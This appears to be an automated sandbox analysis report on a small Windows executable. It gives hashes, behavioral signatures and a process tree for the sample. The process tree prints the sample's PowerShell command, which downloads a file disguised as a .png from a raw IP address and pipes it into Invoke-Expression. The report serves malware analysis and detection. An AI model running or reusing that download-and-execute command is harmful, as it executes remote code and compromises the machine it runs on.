Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
05-11-2021 12:37
Static task
static1
Behavioral task
behavioral1
Sample
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
Resource
win7-en-20211104
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
-
Size
4KB
-
MD5
b9a1c7dd8171afe0e3fc1524f5eafb18
-
SHA1
19b79357841b2bcb3438011f4c8e45f7278aeaa9
-
SHA256
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd952a7da01de33ad60ef
-
SHA512
d57c9cf4a489dec1f8b17351173e1ffc202e454f214b85e132fbd5d8af2d4a611e50e1a7f85eb0dfce438539aaec3b143d1fafafbaa0def914f6401c5993da6d
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 864 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exedescription pid process target process PID 1648 wrote to memory of 864 1648 d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe powershell.exe PID 1648 wrote to memory of 864 1648 d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe powershell.exe PID 1648 wrote to memory of 864 1648 d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe"C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -c cd $env:tmp;Invoke-WebRequest http://79.155.175.45/verona.png -OutFile Error.png;gc Error.png | iex2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/864-57-0x0000000000000000-mapping.dmp
-
memory/864-58-0x000007FEFB961000-0x000007FEFB963000-memory.dmpFilesize
8KB
-
memory/864-60-0x00000000025E0000-0x00000000025E2000-memory.dmpFilesize
8KB
-
memory/864-61-0x00000000025E2000-0x00000000025E4000-memory.dmpFilesize
8KB
-
memory/864-62-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/864-59-0x000007FEF27C0000-0x000007FEF331D000-memory.dmpFilesize
11.4MB
-
memory/864-63-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1648-55-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB